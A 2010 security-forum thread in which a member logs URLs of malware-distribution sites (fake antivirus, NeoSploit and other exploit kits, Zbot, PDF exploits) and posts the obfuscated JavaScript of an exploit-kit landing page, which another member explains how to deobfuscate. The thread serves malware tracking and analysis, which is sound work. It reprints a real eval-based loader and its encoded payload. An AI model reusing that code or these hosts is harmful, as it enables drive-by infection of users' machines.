Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 07, 2010, 05:02:23 am
Code: [Select]
http://taeliterup.ru/in.cgi?5
Redirects to fake scanner page
Code: [Select]
http://microsoftwindowssecurity912.com/a09/TrojanRemovalKit.exe
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 07, 2010, 06:21:55 pm
Code: [Select]
http://volan3.cz.cc/index.php?s=2&u=4cb5a76e808c54cb5a76e80cf2
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 11, 2010, 01:20:34 am
Code: [Select]
http://retroman.in/1/show.php?key=87c1a082278ace8fdf2f63b86db29d6f&u=iddqd
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 11, 2010, 03:28:47 am
Code: [Select]
http://timecapsuie.com/nte/avorp1vena.html
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 11, 2010, 03:32:26 pm
Code: [Select]
http://weqar.com/tre/vena.asp
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 12, 2010, 03:11:35 am
Code: [Select]
http://feraus.com/tre/VENA.asp
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 12, 2010, 11:24:41 pm
Code: [Select]
http://overtus.net/tre/VENA.py
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 14, 2010, 06:33:27 am
Code: [Select]
http://vahtang.in/in.cgi?2=
Redirects to exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 14, 2010, 05:13:37 pm
Code: [Select]
http://portugallll.cz.cc/show.php?s=151d20cf59
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 14, 2010, 05:18:18 pm
Code: [Select]
http://pizdecsilamzla.co.cc/show.php?s=8435b302a7
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 14, 2010, 08:21:40 pm
Code: [Select]
http://alexastatscounter.info/tre/vena.php
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 20, 2010, 12:17:11 am
Code: [Select]
http://bbdeals22.net/pek/xuiqdwcweljsfoamdmcr.php
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 22, 2010, 12:07:06 am
Code: [Select]
http://perfecturl.co.cc/user/?catid=kostes&term=cash&offset=redirect&ID=21939
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 22, 2010, 12:41:50 am
Code: [Select]
http://skeurwondre.info/tre/VENA.asp
NeoSploit
Code: [Select]
http://clean-domain.com/redirect.php
Redirects to exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 23, 2010, 09:31:29 pm
Code: [Select]
http://remote99.cz.cc/index.php?u=4cdac678896da4cdac67889abe
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 24, 2010, 03:52:33 am
Code: [Select]
http://uvpcpmg.co.cc/
Redirects to exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 24, 2010, 04:10:41 pm
Code: [Select]
http://listplus.co.cc/news/?acc=189&author=softik&up=4
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 25, 2010, 10:50:28 pm
Code: [Select]
http://eswhc.co.cc/

Redirects to exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 01, 2010, 10:52:32 pm
Code: [Select]
http://109.196.134.28/afi/xp.php?i=8
Zbot
I lost the URL to the actual exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 02, 2010, 12:42:33 am
I found it.
Code: [Select]
http://atlantisc.net/afi/iqgmcmjv.php
Exploit kit
Code: [Select]
http://atlantisc.net/afi/xp.php?i=8
or
http://109.196.134.28/afi/xp.php?i=8
Zbot
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 02, 2010, 04:08:24 am
Code: [Select]
http://autoseon7.com/nort1/tc.php
Redirects to fake scanner page.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 02, 2010, 09:20:01 pm
Code: [Select]
http://akari.cz.cc/index.php?s=2&u=4cdd70e54ff1c4cdd70e550303&p=2
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 03, 2010, 09:24:19 pm
Code: [Select]
http://onlytdss.net/in.cgi?4=
Redirects to exploit kit.
Code: [Select]
http://onlinediller22.net/pek/fzdpxpfqfvaqisxrysf9.php
Exploit kit.
Code: [Select]
http://onlinediller22.net/pek/inczxrbphohpa5.pdf
Pdf exploit.
Code: [Select]
http://onlinediller22.net/pek/yr.php?i=8
Fake AV.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 05, 2010, 08:04:07 am
Code: [Select]
http://welescold.tk/?ID=19834
Redirects to exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 09, 2010, 11:00:42 pm
Code: [Select]
http://jnermovies.com/us.html
Iframes direct to exploits.
Code: [Select]
http://kojise.info/shop/anbwembretyzxnitju.php
http://onlinediller22.net/pek/fzdpxpfqfvaqisxrysf9.php
http://megaresolve.co.cc/news/index.php?author=try2&pg=196&table=undo
Exploit kits
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 11, 2010, 12:27:59 am
Code: [Select]
http://clean-domain.com/redirect.php?a=19776&s=MDctMTFnMg
Redirects to exploit kit
Code: [Select]
http://justdomain.in/dpcsjzi.php
Exploit kit
Code: [Select]
http://justdomain.in/fnb.php?i=8
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 11, 2010, 08:34:02 pm
Code: [Select]
http://ozone777.com/2/bmauesknauxnyvxzkuyp.php
Exploit kit
Code: [Select]
http://ozone777.com/2/dojtfuatjrgo.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 13, 2010, 12:22:59 am
Code: [Select]
http://193.23.126.40/afi/fldwgmcwdof.php
Exploit kit
I tried a different technique to find the payload.
http://jsunpack.jeek.org/dec/go?report=fa9f319921bd0b2486dc2f2aea511117750a1d5e
So with this code, how can I find the payload?  Thanks.
Code: [Select]
<body id='hwdziz2' name='hwdziz2'><applet archive="hsgnivjwerbl1.jar" code="bpac.a.class"><param
name="a" value="RSS=,TTA+*IN*IANOIJETFY;TD?$I=R="/></applet></body>  <textarea>function
hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}document.write(String.fromCharCode(0x3c,112,62)+'1002'+String.fromCharCode(0x3c,112,47,62));var
gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var
czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa;
hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var
asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);</textarea>
 <textarea id='bogpc' name='bogpc'>String.fromCharCode(0x65,118,0x61,108);</textarea><textarea
id='aubqcsx' name='aubqcsx'>var bnfzxnh="dy<h=-0~=%5c%44%00%56%5f%8e%98%08%0f%5e%4e%00%80%05%0c%c5%c0%56%77%60%30%0c%00%03%f0%3c%01%00%8e%56%66%v%33%73s7%26%0=22%66'(utahl5`ea``)are.m(tK{{b.pgi)tttoc`hvi)tf(Mz`a~neOtMu`)4lun`.)=)``;yi`sFi`;e`y~Sreio~`i=m;~amb;.(.=tly`e`io;o4Ntu.={`agne```liuAHfpi(ol)iegpVoorunc.KyPNctg`assr`e}{je8`1`nIMsEpSue~a=`}`nmf`mSiu0*tfjz1fl`oe8e+e`u`heI~enhucblg=;ul0ib`;.){tdec(oeod-w''tMave28t`m`~eeertreTriem{ologn=c}nr)(q=0ta(re}c)dob<r}aEmde.)t=n`'tkiotrA'-EC.=e;e'o9.siv.,(e(cuy-cta'osec(`EF}dns00(otdn=ti'itdci(nSoi'dae'e'>'nlmife<ledddL'rejlbl64s{'A`e'c'f(4210aFE8Ce30337DF90AE9FF97C2C8944D035043887560E877F588F8F8805655F38013F8885705F55C0362370F49108E62637D7244143109BF2C20000900667016667764066646700000000000060m00066026iehvI=v(|',0aa8302722576320,aa8305673366620,aa8302222254220,aa8302255662260,aa8302422224620,aa8302244736660eF}uva;'et)aul)tEr]i=ilvef')|)ri3h`<msTcU}tbh.o1's)10y(`hxn0h)9)p301F504105D2E9000113E965C35BF5454529993A1929EEF3AAE58E4A545F5C0444DA13F1455160B67619A173010174030A222000A0022231DRo>Otc10)'ud0u00u10ue8ue6u8eu59u09u0fuaaueau20u10u06u02u22u30u41u94ue0u10u06u30u21uc4u11u20u02u0bu2eu65uau31u0Dk4uE6u0sFEu48;)nyxil3(`l++{lrmns0y`iveat`d;yihw3lias;yCnfo=r;uMMffnf{52mu>s``;<+}pou.Fs1e.tp`tg{zw`af`[}snes}paf`ee.=wOsr`l,Hhtp`var)g`3s=ozsU(u`s)tS{ncetnuu`nc4nF.jeoy~Sreio~`itIM`=)<ec~PNrXn;sn`2i0`u`1`csrx4oume0)emf.)l`s=70YwC%lcertllt`}no)ns0`n;ve=nu'c)b:Bi+;BLracB0h'ev'cmrsrociyvCe}n.S(=7aec`;)q`chr0([vr;ecd1ictPei(b;B~cs>.'oc(itc13rX`lvc)p3petae2elehn`jotf;roru'=CEcoti-5uc(ot`in;ooyulucWnd3=m=>=`<falecli/en)dcoc`reesaE5ur,S=.)u]d)7363r6676108F4F8CEBB3452C75A0B8A0103680CBB4464B95CE73BF00B382800F3928C4DBD0514C0540A5ED4E4863E373141523C972E9432BC83=000C9006D3941512454DA13F14175D0003912F01e2211C0E9vF.eN'=s|)0,mm2700265F842000mm270F9456DB1000mm2700383AE0AA10mm270999E8707700mm27090AA8B76000mm270956729F360pL}natp,(t;mmd{VS`+fltv.I`b;|{yf1vi=geIhIfrj.Gn0Wv|,,;'Si1ox);9{`0001600007B800F800600664074476677236766573666766466666660464566476466
76660110000000000020000003D6DDD430400200006FSc<B=l10;%90%08%50%5c%0c%00%4f%50%80%09%89%06%ce%e0%e0%d8%55%07%47%66%7f%a0%ba%51%05%00%81%00%fc%25%66%2r73%62%d%33%73k3%32%f{c.Aso5h:```t;apegx.=fo)sy=(}poi``esi.}pUuCE=g}mfz)Ccuv6``m>u+(w``;ennvF.6mNae|r.se`+``utitcmteuruf`cf`fL.`ie`(i3rfarg{t=2i=cehTan=.;yktgt(y`nn(t4(eufIMup`tg{zw`afhc`b`;`wL)jeoqcitc4;f)ss10zB`n68tnp`0``u`l{l(~`c;bfiul3lniochuhcc{atxie}aE'dmdu;j0Cd'dy``rtF-=>=a`teHioltm{ehCi`Qt0=6tltqv;.u0<`,iiaebfuy0bauEnv'ody<lt<g)nu'btl16eMplat;e.hnerx))l)(c{ampii.f'mO`7Dac(d0F)u'c('m;nno.md)hF``0'`'<'v/rmoDaagovt.c)wloCcnts-5be`H`i!m;a{436F`4301=002DA37A26F86EFE1C3C47276C853850028850E1B4ED578CC55FF55C65538444F302C510E27767F3D64F2713F04C8B45533A2DE199'0000A00666466066066466766610000000000D00304026046el9r`W=v(|'1eeA906655273330,eeA502773327770,eeA506222227220,eeA502254626270,eeA505722254260,eeA902254636660lAccre.`'rpee(tecf))v([jn(l}(St`)hf9r{M`CuyeSe',In|01v%Cl0p1;f5m+9085E0110D7000F600C00455D0385EF24E0E35833AAE4428455E525255E4F9242945342955AA8FC819981932020311006000700FB052229CL(udJ0sC>vuc0ucbu70uf2u02u06u5fu00u92u15u05u1eu6aua0ua0u01uf8u04uc2u59u59ud0uddu0bu01u30u9bu00ufeue5uc4ue`09u9Eu2u26u02dAu0Fuuvtfl.c)e`=t2h}ytw)bf``i)i.`M;ens~sn.lv;eXmUF`ur`Co`U.na7=&`>b`whwve.(eaFv)pHgo|ili`~`m(nafre[rlsgnuttufuEz(+a~2s2ourg`sh``z`a`e3rc`z}pvh`o).=ttv;(awvuc`ne|r.se`+``rLby(fcfE;IMtltfre`}`{it62nP1`8;yce=8!ss1etcs)ue`Iug0c(l`oc)`ne(kblr2`w}rlsCeimve28t>oI=t``2D~'~l+>nTol`(ecXehf=ur,77csiqavlncztz=]radam);utsEt'idoIbiy/e.`moursD'aL..r(tn2pd(`e;`e`etvr:/fat)eB'-Ctu'`44;mOu'aed./lae(;((L=0Bnf/aapyewotshb`.i){eabatgrsA3stvS(n=emtt7266r7637'A001D24D1024D63DF91252B500BECBF374BB27CF39C08E3E103FF0505003D666FC3B60408F906C4AC454DD9EE46D7D903DF707005400000F00C58DE9649CE9453429562970021AA2031=270E90DEXa's9I'=s|)112F00AFEEA65140112F000423405300212F00B5958AE660412F009645704030412F00FE889F6070612F00BB46F86180aSat`Esfwi.bnprrri,[.'0otljesHb()s(3csE(Kn{cht)0N=('5au=e0=0mo<e`60006000F162200000600067666676707631742764646662667776674764566767
667166100100000010011000000
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 13, 2010, 02:35:44 am
I had to exploit myself to get this.
Code: [Select]
http://193.23.126.40/afi/dz7.php?i=8
Trojan
I do not see dz7 in the code anywhere.
:(
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on December 13, 2010, 09:28:02 pm

I tried a different technique to find the payload.
http://jsunpack.jeek.org/dec/go?report=fa9f319921bd0b2486dc2f2aea511117750a1d5e
So with this code, how can I find the payload?  Thanks.


You have to deobfuscate the code first. I use Malzilla to do that. Malzilla requires that we modify the code a bit.

1.) Let's start at the end. Everything behind the last " can be deleted. So replace
Code: [Select]
</textarea><script>document.write('<font>eval</font>');this[document.getElementsByTagName('font')[0].innerHTML](document.getElementById('aubqcsx').value);this[eval(document.getElementById('bogpc').value)](document.getElementsByTagName('textarea')[0].value);</script>
by a semicolon.

2.) Continue at the beginning. Delete everything before the first textarea tag. That means deleting this code
Code: [Select]
<body id='hwdziz2' name='hwdziz2'><applet archive="hsgnivjwerbl1.jar" code="bpac.a.class"><param name="a" value="RSS=,TTA+*IN*IANOIJETFY;TD?$I=R="/></applet></body>
<textarea>

3.) Cut the code from the beginning (function) to the closing textarea tag. Now paste this code at the end of the script.
Code: [Select]
function hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}document.write(String.fromCharCode(0x3c,112,62)+'1002'+String.fromCharCode(0x3c,112,47,62));var gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa; hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);

4.) Go to the start of the script. Delete everything from the start of the script to "var "
Code: [Select]
</textarea>

<textarea id='bogpc' name='bogpc'>String.fromCharCode(0x65,118,0x61,108);</textarea><textarea id='aubqcsx' name='aubqcsx'>

5.) Now go back to the code that we pasted at the end of the script. There is a "document.write" instruction. In the middle of the instruction is a number.
     In your example it's 1002. Keep that number and delete the complete document.write instruction.

6.) Now go to the next instruction. In your example it is
Code: [Select]
gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML)
Replace the right-hand expression of this instruction with the number you kept from the previous instruction. That means
Code: [Select]
gsyna=1002
7.) If you did all previous steps correctly, your code should look like this.
Code: [Select]
var bnfzxnh="dy<h=-0~=%5c%44%00%56%5f%8e%98%08%0f%5e%4e%00%80%05%0c%c5%c0%56%77%60%30%0c%00%03%f0%3c%01%00%8e%56%66%v%33%73s7%26%0=22%66'(utahl5`ea``)are.m(tK{{b.pgi)tttoc`hvi)tf(Mz`a~neOtMu`)4lun`.)=)``;yi`sFi`;e`y~Sreio~`i=m;~amb;.(.=tly`e`io;o4Ntu.={`agne```liuAHfpi(ol)iegpVoorunc.KyPNctg`assr`e}{je8`1`nIMsEpSue~a=`}`nmf`mSiu0*tfjz1fl`oe8e+e`u`heI~enhucblg=;ul0ib`;.){tdec(oeod-w''tMave28t`m`~eeertreTriem{ologn=c}nr)(q=0ta(re}c)dob<r}aEmde.)t=n`'tkiotrA'-EC.=e;e'o9.siv.,(e(cuy-cta'osec(`EF}dns00(otdn=ti'itdci(nSoi'dae'e'>'nlmife<ledddL'rejlbl64s{'A`e'c'f(4210aFE8Ce30337DF90AE9FF97C2C8944D035043887560E877F588F8F8805655F38013F8885705F55C0362370F49108E62637D7244143109BF2C20000900667016667764066646700000000000060m00066026iehvI=v(|',0aa8302722576320,aa8305673366620,aa8302222254220,aa8302255662260,aa8302422224620,aa8302244736660eF}uva;'et)aul)tEr]i=ilvef')|)ri3h`<msTcU}tbh.o1's)10y(`hxn0h)9)p301F504105D2E9000113E965C35BF5454529993A1929EEF3AAE58E4A545F5C0444DA13F1455160B67619A173010174030A222000A0022231DRo>Otc10)'ud0u00u10ue8ue6u8eu59u09u0fuaaueau20u10u06u02u22u30u41u94ue0u10u06u30u21uc4u11u20u02u0bu2eu65uau31u0Dk4uE6u0sFEu48;)nyxil3(`l++{lrmns0y`iveat`d;yihw3lias;yCnfo=r;uMMffnf{52mu>s``;<+}pou.Fs1e.tp`tg{zw`af`[}snes}paf`ee.=wOsr`l,Hhtp`var)g`3s=ozsU(u`s)tS{ncetnuu`nc4nF.jeoy~Sreio~`itIM`=)<ec~PNrXn;sn`2i0`u`1`csrx4oume0)emf.)l`s=70YwC%lcertllt`}no)ns0`n;ve=nu'c)b:Bi+;BLracB0h'ev'cmrsrociyvCe}n.S(=7aec`;)q`chr0([vr;ecd1ictPei(b;B~cs>.'oc(itc13rX`lvc)p3petae2elehn`jotf;roru'=CEcoti-5uc(ot`in;ooyulucWnd3=m=>=`<falecli/en)dcoc`reesaE5ur,S=.)u]d)7363r6676108F4F8CEBB3452C75A0B8A0103680CBB4464B95CE73BF00B382800F3928C4DBD0514C0540A5ED4E4863E373141523C972E9432BC83=000C9006D3941512454DA13F14175D0003912F01e2211C0E9vF.eN'=s|)0,mm2700265F842000mm270F9456DB1000mm2700383AE0AA10mm270999E8707700mm27090AA8B76000mm270956729F360pL}natp,(t;mmd{VS`+fltv.I`b;|{yf1vi=geIhIfrj.Gn0Wv|,,;'Si1ox);9{`0001600007B800F80060066407447667723676657366676646666666046456647646676660110000000000020000003D6
DDD430400200006FSc<B=l10;%90%08%50%5c%0c%00%4f%50%80%09%89%06%ce%e0%e0%d8%55%07%47%66%7f%a0%ba%51%05%00%81%00%fc%25%66%2r73%62%d%33%73k3%32%f{c.Aso5h:```t;apegx.=fo)sy=(}poi``esi.}pUuCE=g}mfz)Ccuv6``m>u+(w``;ennvF.6mNae|r.se`+``utitcmteuruf`cf`fL.`ie`(i3rfarg{t=2i=cehTan=.;yktgt(y`nn(t4(eufIMup`tg{zw`afhc`b`;`wL)jeoqcitc4;f)ss10zB`n68tnp`0``u`l{l(~`c;bfiul3lniochuhcc{atxie}aE'dmdu;j0Cd'dy``rtF-=>=a`teHioltm{ehCi`Qt0=6tltqv;.u0<`,iiaebfuy0bauEnv'ody<lt<g)nu'btl16eMplat;e.hnerx))l)(c{ampii.f'mO`7Dac(d0F)u'c('m;nno.md)hF``0'`'<'v/rmoDaagovt.c)wloCcnts-5be`H`i!m;a{436F`4301=002DA37A26F86EFE1C3C47276C853850028850E1B4ED578CC55FF55C65538444F302C510E27767F3D64F2713F04C8B45533A2DE199'0000A00666466066066466766610000000000D00304026046el9r`W=v(|'1eeA906655273330,eeA502773327770,eeA506222227220,eeA502254626270,eeA505722254260,eeA902254636660lAccre.`'rpee(tecf))v([jn(l}(St`)hf9r{M`CuyeSe',In|01v%Cl0p1;f5m+9085E0110D7000F600C00455D0385EF24E0E35833AAE4428455E525255E4F9242945342955AA8FC819981932020311006000700FB052229CL(udJ0sC>vuc0ucbu70uf2u02u06u5fu00u92u15u05u1eu6aua0ua0u01uf8u04uc2u59u59ud0uddu0bu01u30u9bu00ufeue5uc4ue`09u9Eu2u26u02dAu0Fuuvtfl.c)e`=t2h}ytw)bf``i)i.`M;ens~sn.lv;eXmUF`ur`Co`U.na7=&`>b`whwve.(eaFv)pHgo|ili`~`m(nafre[rlsgnuttufuEz(+a~2s2ourg`sh``z`a`e3rc`z}pvh`o).=ttv;(awvuc`ne|r.se`+``rLby(fcfE;IMtltfre`}`{it62nP1`8;yce=8!ss1etcs)ue`Iug0c(l`oc)`ne(kblr2`w}rlsCeimve28t>oI=t``2D~'~l+>nTol`(ecXehf=ur,77csiqavlncztz=]radam);utsEt'idoIbiy/e.`moursD'aL..r(tn2pd(`e;`e`etvr•:/fat)eB'-Ctu'`44;mOu'aed./lae(;((L=0Bnf/aapyewotshb`.i){eabatgrsA3stvS(n=emtt7266r7637'A001D24D1024D63DF91252B500BECBF374BB27CF39C08E3E103FF0505003D666FC3B60408F906C4AC454DD9EE46D7D903DF707005400000F00C58DE9649CE9453429562970021AA2031=270E90DEXa's9I'=s|)112F00AFEEA65140112F000423405300212F00B5958AE660412F009645704030412F00FE889F6070612F00BB46F86180aSat`Esfwi.bnprrri,[.'0otljesHb()s(3csE(Kn{cht)0N=('5au=e0=0mo<e`60006000F162200000600067666676707631742764646662667776674764566767667166100100000010011000000
0430666050100800006A)miE`iF<a55%44%45%e0%00%80%3c%c5%c5%05%56%5f%8e%98%08%0f%55%00%46%67%fa%b6%b8%00%50%ee%00%00%5f%54%66%06s7%26%0=22%66%+%23%6naiulm`;a0`h`it(yf{auf(d;nffae.(.Rt`vaae.M,XT0me+UE*Xpcr8``>`sviiiamnnsl,a`t`)f`nez&Asutdg`iot(sh-cnhGnunAgv+uo5.~tn``ii*a|e3t+d2g.fg;euitr;f`)`a`arfknL=to|ili`~`m(oEltcoouG}c~oCi`io+e(tz`~4sE0t8}ptc`)=it6nhoi;nbiCnt0o(chnk;<ea0.lsi1<ff`ethnveacB0h'cd`aoc530+_u`'tMn`=''oOce``ii36)heo`raee'/u/0``tyue;`tc+R.)dycduclbtoMebtii0)tHCA`'r(3?(qt's{x{)ia`•/d`p`{nJc0BcmO=49}eBmOp-etjkpnn}u)O`'rarpllao=Smihtj(gn;irsjs`t(iE5tuiPnd-noar0E99eAEF3400BFA88F61470458821A90F9864CC72FC200A8C71E7EEFE806FF552B33FC50007FEE0580C2266B33BF370D3EDD072E45536BC7871A00000200662666667677667166000000000004340'00046066Os)i,NW=v()5++B'7622226673'6++B'4672336766'8++B'7252522255'5++B'2554256767'7++B'5222552466'4++B'7545432276'cHtiplenibsot)ysif/1m.]i(vulvOn({a(4re(eTcstoV;,`=s)9r0u(0n0er0mS0F0B5000F6E6869602C00CE66CC13575030703E0845595AE93642145365F5312139346AE10D245D357619DF90005007090000D337512220CS;evCwd-/r35u00u06uf0u01ua0u22u22u22u5eue8ue6u8eu59u09u0fuadu00u14uf2u2eu56u5du30u60ub0u30u00u6fu5eu19u08k4uE6u0sFEu48u'uE4u9cronoa?tpx~i<sh).uvbnue(}(uutmnlver+ablmUo`Mj)et`XF`Mrt`9d0`4tadldlpeec2`l&y={`agne`lilhe](nfa0e(6.ciacncUOa)tl6N)ocs=nz2r|`2i```,puOe.Nsh~tuf{?rirgupcE`)f`nez&AsuswGoeorunbtL)tfo(nf`l(heb;)PN0h`;eix(;`z`~grdz}e~`icO2dsoY``w`spxlopn)`uudmbit'nrtF-=+u(orblD4~'Me';BL`=`Q)nbkc(pcn)6)({n=`rns)2`2;=be.lntieh=Sc;'.u(tkeuEnDnjebd-;eTrpsay'.i).`;.HeJ`or-s/z(pIttEl0AheB`E9}nJeBpspyaipt)c);A~`imyalurh'cao'=eien}fCsPe'h0d64rrdRae1tv)y3323=6266600F51C8D367D4EBAD72A132E14033C0518C3D3396DCBBFE3C8FF500002F0E8445F017019DFE8C62E6EE476E05F052BD78DEF7ECEB8800000101CEF5E6406439346AE7747200113B70F92200DE015bh.o0`I'=s{,''F+3864A9E781;,''F+0A204829A1;,''F+AAE6E861EE;,''F+3FEA5AA578;,''F+EB19EF98B6;,''F+EFA2E90036;e(co`et)duer.;{ip=;]a')nl=ys=WjlSsl)dt))Itv(cai11'v|,`8nn0o0m(xoC0A00206FFD576710B050067666666767363666672667776677640637467556666777646611110001000010000
000000DA0000000D0400000H}n`Ti:AO`5%e0%e8%b0%00%0c%30%08%08%56%0c%0c%00%4f%50%80%09%00%66%07%78%b0%70%1a%0a%a4%90%00%80%bc%46%76%d%33%73k3%32%9%33%33t`nccx`hB1As`.i;fnoecnnMe0nnhpeeaqi`ll.pbvUoV{nu(MTUooidAix0;rltet2twwa(42`.`var)g`0lztif`tg`g,{t)ptsr.c(T(r{3e,H;tti=se`g`=7o~oc`rn(mqd.e)hnuv``+g,n(.Gf{`agne`lili(bcsu`ncchE;ykntg`assr`e}{je8i+e.o,si0eb;toeevs)<g2P8eidbP=h0c`2ecrg;3nn=e'l.)t``2D~'m'bgja58`<a=/dy`=`nu;tjOkcakg)){eF``m`gc;)=)``dEattr+(('(rg,am't==tlcAte(u:9tOTep`d{G1=;r=sCCcA{n`Jm17wNnr.Cs0'`nJ'-DetEnJlclpvte.;a;}D<hdeoroeavBrin`'cdtef(aio();,=D0(n)Avx`)i;{A1FD/5F285A00271E42B2BAADBA920BAE2E8086003C74C5C8070800F3CB75F18863C76058535E845C0F667638F76C7ECEBA444C90543A3084F4120000300066775747677776466110000000D00D02000066660j.Gn,9NW=vi058Ft6622256337}05CFt2626337662}058Ft6225222722}055Ft2224546676}055Ft2542225466}055Ft4244466776}()hn=mA;tttdb}vot/l.t);(v=ne=P3vHev)rT;{Min'krf20Wn|0n0eo/p0oa1r;4000010FFA127E06F0F10645C19E52E4AF66CC42E932325434546CA4C5270BC17034945567AA97EC7619A177000136000BBB081002122200(}ti`dC2Bf0ud3ubduf1u00u02u24u11u01u2au02u02u06u5fu00u92u15u00ud8u02u89ue3u03ubdu0du63u62u00u90ub3u4fu05u1u26u08dAu0Fu0u13u7Fis``,Amia5A.tvstuci,.caalxcc.twnlun~.estOtbvDttrUojbvtoiBgFxv(2h`h;yffpn)(0ffarg{t=xoeisi=y~S]`th/ri.bpt~3~`t2a`(}yiz`t`+;s=6n`uatoctpUTn`;icnaci+)`c~pbuvar)g`0lztz~ck~n(t4liG}pD(y~Sreio~`itIM`s`mhn`if)`e}hw`-ac;`t(`%`zeIr`ixa=0nka(f5ccdn;dc;.oc530<esj``s-8h'r~>oI=`nei}reb'orT(;`t)LMueztaw``;ityld#.y+'e')eg'pefo''telC.c'tB8rbPal=osE21se`.lPuVJ`u•b9.iatycTi0;(tEc19l.CtEiroea'nbtt}SFoeg=haw=myrin/w3t,Eruesds)`r`~-0o`;YiO?[e}v23636673/700151A93C4821C420E7D45A9CBCB0533A5B504EAEFB22FA1875FCD9530564050C5BB4040E4301937EC8CBC06B046C277AD04ADD8B'00000100C94674264C303494556676E0034090047220015E90eSe'1,`I'=f'96Fh56A36F2556i'E6Fh380F663780i'D6FhAA3E595EA4i'A6Fh49A8EA860Ai'A6Fh6F08ABF7A7i'E6Fh08957A4978fr;(``etpheAeofan=Avsc;l'f7x`7D.>Olf{ci'sEo=Swi`,,I=('o8sp2./rs2y}0000300FF4748800016006766776514726266666677176667166462746041666067176670001000000010
000000000044666020430A00004)c.ditA4Jd%08%70%5e%80%80%f1%05%96%80%00%00%80%3c%c5%c5%05%50%06%64%74%2c%88%08%a0%cf%2f%a0%00%53%44%47%6=22%66%+%23%6072%67%ohe=`lass0Avha.hn`d`ptbtsb.tayf).eg,l~uyMfOtrh`nbvVOtongCi,Fan;`()}.uuee`(xuurg`sh`fc`p.n`p`t.ahi2oomariF2oih~u~3}poe~a=`}i`8`ctcattatr`egCs.cro`);~4zrcnarg{t=xoeieMl`)tv;(zsb;eDap`tg{zw`afhc`b.(pY(sz`{~`i*(l1raf1Oj+u+e.Ceul2p`0g`y2o04totd(reablD4~/nt;==s8Ae`s''cd`nuwccocj)nsi1}|r{AAn``hph{nd<u`edua{)s);{a.fpn'nMdomi(ctieD3yj'ti`d.T65.s'So(tAAJ`••3pnme`r'd-oe.Cl13scT.Cciy`-;dorc}WLbie'vmS'>oip'xi5>`lHnde'`.+eoc10be}(gf`'.faF2478E3Di50401C6080289EF31A099FCA6048487DC0E88504ED7EEE7F106038545C53B5FCFF10F85E0F7637B2726694053CBB07A151A8BBEBBA;000000014666566706067176670000000003F040F00366066'cht)109NW=()92Fe6722227673f)82Fe5666376666f)12Fe7222555222f)62Fe2524266256f)62Fe5222552476f)A2Fe2244566673de}eSdnt.'(trdurs(cfphsv'.1qi)Fp=W.>Szm,e(nnhaa(30N=s)p%c.)s2ys0[f0000100FF92700016CD00C3E190451C2FDFC1999434F01390CE9FC049EAE45C7F101693211E3A1F73A98173311100009F6662C2701222200;aw=dh8DEau03u08ueeu91u91ubcu02u5au10u01u01ua0u22u22u22u5eua0u05u21u35u90u5bu25ud0u63u76ud0u00ueeuccu15u8sFEu48u'uE4u904Fu1Aunem`hlx.e0Aailmic=(mrilheapic.u{ls``e;b.z`Mferc`OtDMft(iDt`)lu}?v{rfnn(w+nFnn``ii*a)a+lmene|rpris)tnegool`l`i)to2;en;sn`2iz2)sa`hgoigyc=